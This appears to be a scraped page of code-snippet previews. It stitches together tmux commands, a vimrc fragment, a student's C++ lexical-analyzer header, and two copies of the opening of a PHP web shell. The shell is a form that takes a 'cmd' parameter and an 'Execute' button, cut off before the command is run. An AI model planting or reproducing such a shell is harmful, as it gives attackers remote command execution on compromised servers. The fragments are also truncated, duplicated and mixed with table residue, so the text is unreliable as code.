start new:
tmux
start new with session name:
tmux new -s myname
| " Don't try to be vi compatible | |
| set nocompatible | |
| " Helps force plugins to load correctly when it is turned back on below | |
| filetype off | |
| " TODO: Load plugins here (pathogen or vundle) | |
| " Turn on syntax highlighting | |
| syntax on |
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if($_GET['cmd']) | |
| { |
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if($_GET['cmd']) | |
| { |
| //============================================================================ | |
| // Task : Compiler | |
| // Description : Lexical Analyzer | |
| // Name : Mahmoud Mohamed Fathy | |
| // ID : 2012030135 | |
| //============================================================================ | |
| #include <iostream> | |
| #include <fstream> | |
| #include <string> |